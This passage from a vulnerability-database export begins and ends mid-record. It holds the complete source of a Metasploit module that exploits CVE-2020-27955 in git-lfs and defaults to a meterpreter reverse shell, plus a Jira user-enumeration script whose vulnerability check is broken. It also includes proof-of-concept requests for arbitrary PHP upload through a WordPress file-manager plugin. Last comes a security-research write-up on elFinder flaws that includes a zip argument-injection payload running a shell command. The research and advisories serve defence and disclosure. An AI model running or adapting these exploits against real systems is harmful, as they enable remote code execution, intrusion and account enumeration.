remote code execution if the Windows-using victim is tricked into cloning the attacker\u2019s malicious repository using a vulnerable Git version control tool\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-03T21:15:38", "type": "metasploit", "title": "Git Remote Code Execution via git-lfs (CVE-2020-27955)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955"], "modified": "2021-09-14T20:32:25", "id": "MSF:EXPLOIT-WINDOWS-HTTP-GIT_LFS_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/windows/http/git_lfs_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n include Msf::Exploit::Git\n include Msf::Exploit::Git::Lfs\n include Msf::Exploit::Git::SmartHttp\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::FileDropper\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Git Remote Code Execution via git-lfs (CVE-2020-27955)',\n 'Description' => %q{\n A critical vulnerability (CVE-2020-27955) in Git Large File Storage (Git LFS), an open source Git extension for\n versioning large files, allows attackers to achieve remote code execution if the Windows-using victim is tricked\n into cloning the attacker\u2019s malicious repository using a vulnerable Git version control tool\n },\n 'Author' => [\n 'Dawid Golunski ', # Discovery\n 'space-r7', # Guidance, git mixins\n 'jheysel-r7' # Metasploit module\n ],\n 'References' => [\n ['CVE', '2020-27955'],\n ['URL', 'https://www.helpnetsecurity.com/2020/11/05/cve-2020-27955/']\n ],\n 'DisclosureDate' => '2020-11-04', # Public disclosure\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Git LFS <= 2.12',\n {\n 'Platform' => ['win']\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',\n 'WfsDelay' => 10\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [\n ARTIFACTS_ON_DISK\n ]\n }\n )\n )\n\n register_options([\n OptString.new('GIT_URI', [ false, 'The URI to use as the malicious Git instance (empty for random)', '' ])\n ])\n deregister_options('RHOSTS')\n end\n\n def setup_repo_structure\n payload_fname = 'git.exe'\n @hook_payload = generate_payload_exe\n\n ptr_file = generate_pointer_file(@hook_payload)\n git_payload_ptr = GitObject.build_blob_object(ptr_file)\n\n git_attr_fname = '.gitattributes'\n git_attr_content = \"#{payload_fname} filter=lfs diff=lfs merge=lfs\"\n git_attr_obj = GitObject.build_blob_object(git_attr_content)\n\n register_dir_for_cleanup('.git')\n register_files_for_cleanup(git_attr_fname)\n\n # root of repository\n tree_ent =\n [\n {\n mode: '100644',\n file_name: git_attr_fname,\n sha1: git_attr_obj.sha1\n },\n {\n mode: '100755',\n file_name: payload_fname,\n sha1: git_payload_ptr.sha1\n }\n ]\n\n tree_obj = GitObject.build_tree_object(tree_ent)\n commit = GitObject.build_commit_object(tree_sha1: tree_obj.sha1)\n\n @git_objs =\n [\n commit, tree_obj, git_attr_obj, git_payload_ptr\n ]\n\n @refs =\n {\n 'HEAD' => 'refs/heads/master',\n 'refs/heads/master' => commit.sha1\n }\n end\n\n #\n # Determine whether or not the target is exploitable based on the User-Agent header returned from the client.\n # The git version must be equal or less than 2.29.2 while git-lfs needs to be equal or less than 2.12.0 to be\n # exploitable by this vulnerability.\n #\n # Returns +true+ if the target is suitable, else fail_with descriptive message\n #\n def target_suitable?(user_agent)\n info = fingerprint_user_agent(user_agent)\n if info[:ua_name] == Msf::HttpClients::UNKNOWN\n fail_with(Failure::NoTarget, \"The client's User-Agent string was unidentifiable: #{info}. The client needs to clone the malicious repo on windows with a git version less than 2.29.0\")\n end\n\n if info[:os_name] == 'Windows' &&\n ((info[:ua_name] == Msf::HttpClients::GIT && Rex::Version.new(info[:ua_ver]) <= Rex::Version.new('2.29.2')) ||\n (info[:ua_name] == Msf::HttpClients::GIT_LFS && Rex::Version.new(info[:ua_ver]) <= Rex::Version.new('2.12')))\n true\n else\n fail_with(Failure::NotVulnerable, \"The git client needs to be running on Windows with a version equal or less than 2.29.2 while git-lfs needs to be equal or less than 2.12.0. The user agent, #{info[:ua_name]}, found was running on, #{info[:os_name]} and was at version: #{info[:ua_ver]}\")\n end\n end\n\n def on_request_uri(cli, req)\n target_suitable?(req.headers['User-Agent'])\n if req.uri.include?('git-upload-pack')\n request = Msf::Exploit::Git::SmartHttp::Request.parse_raw_request(req)\n case request.type\n when 'ref-discovery'\n response = send_refs(request)\n when 'upload-pack'\n response = send_requested_objs(request)\n else\n fail_with(Failure::UnexpectedReply, 'Git client did not send a valid request')\n end\n else\n response = handle_lfs_objects(req, @hook_payload, @git_addr)\n unless response.code == 200\n cli.send_response(response)\n fail_with(Failure::UnexpectedReply, 'Failed to respond to Git client\\'s LFS request')\n end\n end\n cli.send_response(response)\n end\n\n def create_git_uri\n \"/#{Faker::App.name.downcase}.git\".gsub(' ', '-')\n end\n\n def primer\n @git_repo_uri = datastore['GIT_URI'].empty? ? create_git_uri : datastore['GIT_URI']\n @git_addr = URI.parse(get_uri).merge(@git_repo_uri)\n print_status(\"Git repository to clone: #{@git_addr}\")\n hardcoded_uripath(@git_repo_uri)\n hardcoded_uripath(\"/#{Digest::SHA256.hexdigest(@hook_payload)}\")\n end\n\n def handle_lfs_objects(req, hook_payload, git_addr)\n git_hook_obj = GitObject.build_blob_object(hook_payload)\n\n case req.method\n when 'POST'\n print_status('Sending payload data...')\n response = get_batch_response(req, git_addr, git_hook_obj)\n fail_with(Failure::UnexpectedReply, 'Client request was invalid') unless response\n when 'GET'\n print_status('Sending LFS object...')\n response = get_requested_obj_response(req, git_hook_obj)\n fail_with(Failure::UnexpectedReply, 'Client sent invalid request') unless response\n else\n fail_with(Failure::UnexpectedReply, 'Unable to handle client\\'s request')\n end\n\n response\n end\n\n def send_refs(req)\n fail_with(Failure::UnexpectedReply, 'Git client did not perform a clone') unless req.service == 'git-upload-pack'\n\n response = get_ref_discovery_response(req, @refs)\n fail_with(Failure::UnexpectedReply, 'Failed to build a proper response to the ref discovery request') unless response\n\n response\n end\n\n def send_requested_objs(req)\n upload_pack_resp = get_upload_pack_response(req, @git_objs)\n unless upload_pack_resp\n fail_with(Failure::UnexpectedReply, 'Could not generate upload-pack response')\n end\n\n upload_pack_resp\n end\n\n def exploit\n setup_repo_structure\n super\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/git_lfs_rce.rb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2022-08-16T06:05:22", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2021-03-10T00:00:00", "type": "exploitdb", "title": "Atlassian JIRA 8.11.1 - User Enumeration", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2020-14181", "CVE-2020-14181"], "modified": "2021-03-10T00:00:00", "id": "EDB-ID:49633", "href": "https://www.exploit-db.com/exploits/49633", "sourceData": "# Title: Atlassian JIRA 8.11.1 - User Enumeration\r\n# Author: Dolev Farhi\r\n# Vulnerable versions: version < 7.13.16, 8.0.0 \u2264 version < 8.5.7, 8.6.0 \u2264 version < 8.12.0\r\n# CVE: CVE-2020-14181\r\n# Credit to original CVE author: Mikhail Klyuchnikov of Positive Technologies.\r\n\r\nimport sys\r\nimport os\r\nimport requests\r\n\r\ndef help():\r\n print('python3 script.py <target> <usernames_file>')\r\n print('e.g. python3 script.py https://jiratarget.com usernames.txt')\r\n sys.exit()\r\n\r\nif len(sys.argv) < 3:\r\n help()\r\n\r\nserver = sys.argv[1]\r\nusernames = sys.argv[2]\r\n\r\nrandom_user = '0x00001'\r\n\r\ntry:\r\n os.path.exists(usernames)\r\nexcept:\r\n print(usernames, 'file does not exist.')\r\n sys.exit(1)\r\n\r\ndef test_vulnerable():\r\n resp = requests.get('{}/secure/ViewUserHover.jspa?username={}'.format(server, username))\r\n if 'User does not exist: {}'.format(random_user) in resp.text:\r\n return True\r\n return False\r\n\r\nif test_vulnerable is False:\r\n print('server is not vulnerable.')\r\n sys.exit(1)\r\n\r\nf = open(usernames, 'r').read()\r\n\r\nfor username in f.splitlines():\r\n resp = requests.get('{}/secure/ViewUserHover.jspa?username={}'.format(server, username))\r\n if 'User does not exist' not in resp.text:\r\n print('EXISTS', username)", "sourceHref": "https://www.exploit-db.com/download/49633", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "wpvulndb": [{"lastseen": "2022-04-15T14:18:16", "description": "The plugin is using an outdated version of the elFinder library, which is know to be affected by security issues (CVE-2021-32682), and does not have any authorisation as well as CSRF checks in its connector AJAX action, allowing any authenticated users, such as subscriber to call it. Furthermore, as the options passed to the elFinder library does not restrict any file type, users with a role as low as subscriber can Create/Upload/Delete Arbitrary files and folders.\n\n### PoC\n\nCreate an empty file to /aa.txt: POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 53 Connection: close Cookie: [any authenticated user] action=connector&cmd;=mkfile&name;=aa.txt&target;=l1_Lw Upload a PHP file to /hello.php: POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------14077557643203747161684872583 Content-Length: 597 Connection: close Cookie: [any authenticated user] \\-----------------------------14077557643203747161684872583 Content-Disposition: form-data; name=\"cmd\" upload \\-----------------------------14077557643203747161684872583 Content-Disposition: form-data; name=\"target\" l1_Lw \\-----------------------------14077557643203747161684872583 Content-Disposition: form-data; name=\"action\" connector \\-----------------------------14077557643203747161684872583 Content-Disposition: form-data; name=\"upload[]\"; filename=\"hello.php\" Content-Type: text/plain \\-----------------------------14077557643203747161684872583-- \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-14T00:00:00", "type": "wpvulndb", "title": " Library File Manager < 5.2.3 - Subscriber+ Arbitrary File Creation/Upload/Deletion", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32682", "CVE-2022-0403"], "modified": "2022-04-11T07:40:39", "id": "WPVDB-ID:997A7FBF-98C6-453E-AD84-75C1E91D5A1E", "href": "https://wpscan.com/vulnerability/997a7fbf-98c6-453e-ad84-75c1e91d5a1e", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "sonarsource": [{"lastseen": "2021-08-17T18:51:25", "description": "![Web file manager compromise by an unauthenticated attacker](https://images.prismic.io/sonarsource/287ee4a6-069f-4503-a54e-a156cf80dcfc_elFinder+Blogpost+%402x.png?auto=compress,format)\n\nAn application\u2019s interaction with the file system is always highly security sensitive, since minor functional bugs can easily be the source of exploitable vulnerabilities. This observation is especially true in the case of web file managers, whose role is to replicate the features of a complete file system and expose it to the client\u2019s browser in a transparent way.\n\nelFinder is a popular web file manager often used in CMS and frameworks, such as WordPress plugins (wp-file-manager) or Symfony bundles, to allow easy operations on both local and remote files. In the past, elFinder has been part of active in-the-wild attacks targeting unsafe configuration or actual code vulnerabilities. Thus, elFinder is published with a safe default configuration to prevent any malicious use by attackers.\n\nAs part of our regular assessment of widely deployed open-source projects, we discovered multiple new code vulnerabilities in elFinder. In the following case study of common code vulnerabilities in web file managers, we describe five different vulnerability chains and demonstrate how they could be exploited to gain control of the underlying server and its data. We will also discuss some of the patches that were later implemented by the vendor to show how to prevent them in your own code.\n\n## Impact\n\nWe worked on the development branch, commit [f9c906d](<https://github.com/Studio-42/elFinder/commit/f9c906d808d1721a62fc2a4fdb38d77c1c1ff229>). Findings were also confirmed on release 2.1.57; all affect the default configuration (unless specified otherwise in this article) and do not require prior authentication. As we mentioned, the exploitation of these vulnerabilities can let an attacker execute arbitrary PHP code on the server where elFinder is installed, ultimately leading to its compromise. \n\nThe findings we discuss in this blog post (all assigned to CVE-2021-32682) and successfully exploited to gain code execution are: \n\n * Deleting Arbitrary Files\n * Moving Arbitrary Files\n * Uploading PHP Files\n * Argument Injection\n * Race Condition\n\nAll these bug classes are very common in software that exposes filesystems to users, and are likely to impact a broad range of products, not only elFinder. \n\nelFinder released version 2.1.59 to address all the bugs we responsibly disclosed. There is no doubt these vulnerabilities will also be exploited in the wild, because exploits [targeting old versions have been publicly released](<https://www.exploit-db.com/search?text=connector.minimal.php>) and the connectors filenames are part of [compilations](<https://github.com/koaj/ffw-content-discovery/blob/9bda1a1ebde71e84bcfde15c46524527bb24087f/cve-wordlist.txt>) of paths to look for when trying to compromise websites. Hence, we highly recommend that all users immediately upgrade elFinder to the latest version.\n\n## Technical Details\n\nelFinder comes with a back end (also called _connector_) written in PHP and a front end written in HTML and JavaScript. The _connector_ is the main script that dispatches the actions of the front end code to the right back end code to implement file system features. Connectors can be configured to disallow dangerous actions, restrict uploads to specific MIME types: two different ones are part of the default install. We detected vulnerabilities in the so-called \u201cminimal\u201d connector. It only allows image and plain text uploads and FTP is the only supported remote virtual filesystem: this is presumably the safest one and the most likely to be deployed. \n\nTo give a better understanding of the code snippets we will use to demonstrate our findings, we will first describe how elFinder\u2019s routing works. Like in many modern PHP applications, the connector (e.g. connector.minimal.php) is the only entry point. It declares configuration directives and closures and then instantiates both elFinder (the core) and elFinderConnector (the interface between elFinder and the transport channel, here HTTP). \n\nThe attribute elFinder::$commands contains every valid action and the expected arguments:\n\n**php/elFinder.class.php**\n \n \n protected $commands = array(\n \u00a0\u00a0'abort' => array('id' => true),\n \u00a0\u00a0'archive' => array('targets' => true, 'type' => true, 'mimes' => false, 'name' => false),\n \u00a0\u00a0'callback' => array('node' => true, 'json' => false, 'bind' => false, 'done' => false),\n \u00a0\u00a0'chmod' => array('targets' => true, 'mode' => true),\n \u00a0\u00a0'dim' => array('target' => true, 'substitute' => false),\n \u00a0\u00a0'duplicate' => array('targets' => true, 'suffix' => false),\n // [...]\n\nThe user can call any of these commands by providing the cmd parameter with the required command parameter via PATH_INFO, GET, or POST. In each command handler, parameters are accessed using $args.\n\nTo allow remote filesystems (FTP, Dropbox, etc.) to be used with local ones, elFinder implements a filesystem abstraction layer (elFinderVolumeDriver) on top of which all drivers are built. Files are then referenced by their volume name (e.g. t1_ is the trash, l1_ the default local volume) and the URL-safe Base64 of their name. \n\nLet\u2019s first dig into an arbitrary file deletion bug chain, composed of two distinct issues.\n\n### Deleting Arbitrary Files\n\nThe PHP core does not provide an effective way to run background threads, or perform synchronization and inter-process communication. elFinder tries to balance this by heavily using temporary files and post-request hooks. For instance, users can abort ongoing actions by calling the method of the same name:\n\n**php/elFinder.class.php**\n \n \n protected function abort($args = array())\n {\n if (!elFinder::$connectionFlagsPath || $_SERVER['REQUEST_METHOD'] === 'HEAD') {\n return;\n }\n \n $flagFile = elFinder::$connectionFlagsPath . DIRECTORY_SEPARATOR . 'elfreq%s';\n if (!empty($args['makeFile'])) { \n self::$abortCheckFile = sprintf($flagFile, $args['makeFile']); // <-- [1]\n touch(self::$abortCheckFile);\n $GLOBALS['elFinderTempFiles'][self::$abortCheckFile] = true;\n return;\n }\n \n $file = !empty($args['id']) ? sprintf($flagFile, $args['id']) : self::$abortCheckFile; // <-- [2]\n $file && is_file($file) && unlink($file);\n }\n\nHere, a code vulnerability is present at [1] and [2]: a user-controlled parameter is concatenated into a full path without prior checks. For [1], it can end up creating an empty file with a fully controllable name, and in [2] it can be used to remove an arbitrary file. SonarCloud issues for both bugs are available: [[1]](<https://sonarcloud.io/project/issues?id=SonarSourceResearch_elFinder2&open=AXhbTmQAMtwvSXpgjgi3&resolved=false&sonarsourceSecurity=path-traversal-injection&types=VULNERABILITY>) and [[2]](<https://sonarcloud.io/project/issues?id=SonarSourceResearch_elFinder2&open=AXhbTmQAMtwvSXpgjgi1&resolved=false&sonarsourceSecurity=path-traversal-injection&types=VULNERABILITY>).\n\nThere is a catch: the filename resulting from [1] will be prefixed by elfreq. In a path traversal attack, POSIX systems will fail path resolution if any predecessor in the path does not exist or is not a directory. For instance, resolving /tmp/i_do_not_exist/../ or /tmp/i_am_a_file/../ will respectively fail with ENOENT and ENOTDIR. This prerequisite makes the exploitation of these two vulnerabilities impossible as-is, and will require another bug, such as the ability to create an arbitrary directory.\n\nAn attacker could then look into the command mkdir and discover a primitive that allows this exact behaviour. Here is its top-level handler, before it goes through the filesystem abstraction layer:\n\n**php/elFinder.class.php**\n \n \n function mkdir($args)\n {\n $target = $args['target'];\n $name = $args['name'];\n $dirs = $args['dirs'];\n // [...]\n if (($volume = $this->volume($target)) == false) {\n return array('error' => $this->error(self::ERROR_MKDIR, $name, self::ERROR_TRGDIR_NOT_FOUND, '#' . $target));\n }\n // [...]\n return ($dir = $volume->mkdir($target, $name)) == false\n ? array('error' => $this->error(self::ERROR_MKDIR, $name, $volume->error()))\n : array('added' => array($dir));\n }\n }\n\nA generic implementation is present in elFinderVolumeDriver to handle both the volume and path that should be created. It will call the volume-specific implementation at [1] with the volume absolute path on the filesystem as the first parameter and the target name as the second parameter: \n\n**php/elFinderVolumeDriver.class.php**\n \n \n public function mkdir($dsthash, $name)\n {\n // [...]\n $path = $this->decode($dsthash);\n // [...]\n $dst = $this->joinPathCE($path, $name);\n // v--- [1]\n $mkpath = $this->convEncOut($this->_mkdir($this->convEncIn($path), $this->convEncIn($name)));\n if ($mkpath) {\n $this->clearstatcache();\n $this->updateSubdirsCache($path, true);\n $this->updateSubdirsCache($mkpath, false);\n }\n \n return $mkpath ? $this->stat($mkpath) : false;\n }\n\nIt is defined as follows:\n\n**php/elFinderVolumeLocalFileSystem.class.php**\n \n \n protected function _joinPath($dir, $name)\n {\n return rtrim($dir, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR . $name;\n }\n \n protected function _mkdir($path, $name)\n {\n $path = $this->_joinPath($path, $name);\n \n if (mkdir($path)) {\n chmod($path, $this->options['dirMode']);\n return $path;\n }\n \n return false;\n }\n\nelFinderVolumeLocalFileSystem::_joinPath() is doing a mere concatenation of the two values, leading to a path traversal vulnerability. This gives a primitive to create arbitrary, empty folders on the local filesystem. While not being a vulnerability in itself, it will allow the exploitation of the aforementioned behaviour. \n\nIt is also worth noting the presence of a full path disclosure in the rm command, disclosing the absolute path of a given file on the local filesystem:\n\n**php/elFinderVolumeDriver.class.php**\n \n \n protected function remove($path, $force = false)\n {\n $stat = $this->stat($path);\n \n if (empty($stat)) {\n return $this->setError(elFinder::ERROR_RM, $path, elFinder::ERROR_FILE_NOT_FOUND);\n }\n\nThe impact of this vulnerability is quite dependent on the environment: it could be chained with other elFinder bugs, used to trigger interesting behaviors in other applications (e.g. [remove WordPress\u2019 wp-config.php file to gain code execution](<https://blog.sonarsource.com/wordpress-file-delete-to-code-execution>)) or used to affect existing security measures (e.g. removing .htaccess files).\n\nThis vulnerability has been [fixed](<https://github.com/Studio-42/elFinder/commit/a106c350b7dfe666a81d6b576816db9fe0899b17#diff-6fe96d285bdbb6d8cf10335a4684ceb4f8badaa6bb7190a4f6b0d960d1af8904L347-R369>) by improving the implementation of elFinderVolumeLocalFileSystem::_joinPath() to assert that the final path won\u2019t be outside of the base one. Several calls to basename() across the codebase were also added as a hardening measure.\n\n### Moving Arbitrary Files\n\nThis same elFinderVolumeLocalFileSystem::_joinPath() method is used in other actions, such as rename: it combines a volume base directory and a user-provided destination name. It is thus vulnerable to the bug we just described. \n\nThe following snippet is the actual implementation of elFinderVolumeLocalFileSystem::rename(), after executing all the code responsible for decoding the paths and ensuring that the destination extension is allowed:\n\n**php/elFinderVolumeLocalFileSystem.class.php**\n \n \n protected function _move($source, $targetDir, $name)\n {\n $mtime = filemtime($source);\n $target = $this->_joinPath($targetDir, $name);\n if ($ret = rename($source, $target) ? $target : false) {\n isset($this->options['keepTimestamp']['move']) && $mtime && touch($target, $mtime);\n }\n return $ret;\n }\n\nWhile the destination extension is still strictly limited by MIME checks, this primitive can be enough for an unauthenticated attacker to gain command execution on the server, depending on the environment, by overriding files like authorized_keys, composer.json, etc. This bug [has been fixed](<https://github.com/Studio-42/elFinder/commit/a106c350b7dfe666a81d6b576816db9fe0899b17#diff-6fe96d285bdbb6d8cf10335a4684ceb4f8badaa6bb7190a4f6b0d960d1af8904L347-R369>) with the same patch as the previous bug we discussed.\n\n### Uploading PHP Files\n\nAs for most PHP applications, the biggest threat faced by elFinder is that an attacker could be able to upload PHP scripts to the server, since nothing (except quite a hardened web server configuration) would prevent them from accessing it directly to execute its contents. The maintainers initially tried to defend against that by crafting a block-list that associated dangerous MIME types to the relevant extensions:\n\n**php/elFinderVolumeDriver.class.php**\n \n \n 'staticMineMap' => array(\n 'php:*' => 'text/x-php',\n 'pht:*' => 'text/x-php',\n 'php3:*' => 'text/x-php',\n 'php4:*' => 'text/x-php',\n 'php5:*' => 'text/x-php',\n 'php7:*' => 'text/x-php',\n 'phtml:*' => 'text/x-php',\n // [...]\n\nIn our test environment (Apache HTTP 2.4.46-1ubuntu1 on Ubuntu 20.10), the default configuration declares that .phar files should be treated as application/x-httpd-php ([1]) and be interpreted:\n \n \n $ cat /etc/apache2/mods-available/php7.4.conf\n <FilesMatch \".+\\.ph(ar|p|tml)$\"> \n SetHandler application/x-httpd-php # <-- [1]\n </FilesMatch> \n <FilesMatch \".+\\.phps$\">\n SetHandler application/x-httpd-php-source\n # Deny access to raw php sources by default\n # To re-enable it's recommended to enable access to the files\n # only in specific virtual host or directory\n Require all denied\n </FilesMatch>\n # Deny access to files without filename (e.g. '.php')\n <FilesMatch \"^\\.ph(ar|p|ps|tml)$\">\n Require all denied\n </FilesMatch>\n // [...]\n\nThis configuration was also observed on Debian\u2019s stable release. While another pass of MIME type detection is performed on the contents of the file, this can be easily circumvented as the PHP interpreter allows statements anywhere in the interpreted files (e.g. <?php can be placed after some dummy data).\n\nThe [fix](<https://github.com/Studio-42/elFinder/commit/75ea92decc16a5daf7f618f85dc621d1b534b5e1>) is straightforward: it declares that .phar files are associated with the MIME text/x-php, which are disallowed by default. \n\n### Argument Injection\n\nAmong the default features that make elFinder so powerful, users can select multiple files and archive them using external tools such as zip, rar, and 7z. This functionality is exposed under the action named archive:\n\n**php/elFinder.class.php**\n \n \n public function archive($args)\n {\n $targets = isset($args['targets']) && is_array($args['targets']) ? $args['targets'] : array();\n $name = isset($args['name']) ? $args['name'] : '';\n \n if (($volume = $this->volume($targets[0])) == false) {\n return $this->error(self::ERROR_ARCHIVE, self::ERROR_TRGDIR_NOT_FOUND);\n }\n \n foreach ($targets as $target) {\n $this->itemLock($target);\n }\n \n return ($file = $volume->archive($targets, $args['type'], $name))\n ? array('added' => array($file))\n : array('error' => $this->error(self::ERROR_ARCHIVE, $volume->error()));\n }\n\nNote that users can create archives even if their upload is forbidden, by calling the archive command on existing files. The implementation is specific to the virtual filesystem in use. We will focus solely on the default one, since it is inherited by elFinderVolumeLocalFileSystem which crafts the full command line ([1]) and executes it with the default shell ([2]):\n\n**php/elFinderVolumeLocalFileSystem.class.php**\n \n \n protected function makeArchive($dir, $files, $name, $arc)\n {\n // [...]\n $cwd = getcwd();\n if (chdir($dir)) {\n foreach ($files as $i => $file) {\n $files[$i] = '.' . DIRECTORY_SEPARATOR . basename($file);\n }\n $files = array_map('escapeshellarg', $files);\n \n $cmd = $arc['cmd'] . ' ' . $arc['argc'] . ' ' . escapeshellarg($name) . ' ' . implode(' ', $files); // <-- [1]\n $this->procExec($cmd, $o, $c); // <-- [2]\n // [...]\n\nHere, the value of $name comes from the user-controlled parameter $_GET['name']. While properly escaped with escapeshellarg() to prevent the use of command substitution sequences, the program will try to parse this value as a flag (\\--foo=bar) and then as a positional argument. It is also worth noting that the user's value is suffixed with .zip in the case in which the ZIP archiver is selected.\n\nThe command zip implements an integrity test feature (-T) that can be used along with -TT to specify the test command to run. In the present case, it gives the attacker a way to execute arbitrary commands using this parameter injection.\n\nTo be able to exploit this vulnerability, the attacker needs to create a dummy file (e.g. a.txt), archive it to create a.zip and then invoke the archive action with both the original file and the archive as targets, using a name like -TmTT="$(id>out.txt)foooo".\n\nThe resulting command line will be zip -r9 -q '-TmTT="$(id>out.txt)foooo".zip' './a.zip' './a.txt', thus executing id and logging its standard output into out.txt \u2014 this file will be available with the other documents in elFinder\u2019s interface.\n\nWhen it came time to fix this bug, zip wasn't very friendly. The usual method based on POSIX\u2019s \\-- ([see our previous article about a parameter injection in Composer for an in-depth explanation](<https://blog.sonasource.com/php-supply-chain-attack-on-composer>)) can\u2019t be applied here, since zip will exit with the following error:\n \n \n zip error: Invalid command arguments (can't use -- before archive name)\n\nThe maintainers then [decided to prefix the archive name with ./ to prevent any risk of parameter injection](<https://github.com/Studio-42/elFinder/commit/a106c350b7dfe666a81d6b576816db9fe0899b17#diff-85602823cf2cdaf2502dc4f1b97001ffc0f083652aef175d9f068a5bfe90ca71L6875-R6882>). They also decided to harden the calls to the other archivers (7z, rar, etc.) in the same patch. \n\n### Quarantine and Race Condition\n\nLet\u2019s have a look at our last finding of this case study. While this vulnerability in the quarantine feature cannot be exploited in the default configuration since archives can\u2019t be uploaded; the feature could have been responsible for future security issues because of its design. \n\nThe rationale behind the quarantine is that archives may contain unwanted files (mostly PHP scripts) that should not be extracted in the current folder without first running security checks (e.g. with MIME validation). So instead, elFinder chose to extract archives into a folder named .quarantine, placed under the files/ folder, and elFinderVolumeLocalFileSystem::_extract() generates a random directory name for each archive extraction (at [1]):\n\n**php/elFinderVolumeLocalFileSystem.class.php**\n \n \n protected function _extract($path, $arc)\n {\n if ($this->quarantine) {\n $dir = $this->quarantine . DIRECTORY_SEPARATOR . md5(basename($path) . mt_rand()); // <-- [1]\n $archive = (isset($arc['toSpec']) || $arc['cmd'] === 'phpfunction') ? '' : $dir . DIRECTORY_SEPARATOR . basename($path);\n // [...]\n\nThis can be confirmed dynamically thanks to strace or the inotify suite, for instance here with an archive containing a PHP file:\n \n \n $ inotifywait -m -r .\n ./ CREATE,ISDIR efbf975ccbac8727f434574610a0f1b6\n ./ OPEN,ISDIR efbf975ccbac8727f434574610a0f1b6\n ]...[\n ./efbf975ccbac8727f434574610a0f1b6/ ATTRIB,ISDIR\n ./efbf975ccbac8727f434574610a0f1b6/ CREATE win.php\n ./efbf975ccbac8727f434574610a0f1b6/ OPEN win.php\n ./efbf975ccbac8727f434574610a0f1b6/ MODIFY win.php\n ./efbf975ccbac8727f434574610a0f1b6/ ATTRIB win.php\n ./efbf975ccbac8727f434574610a0f1b6/ CLOSE_WRITE,CLOSE win.php\n ./efbf975ccbac8727f434574610a0f1b6/ 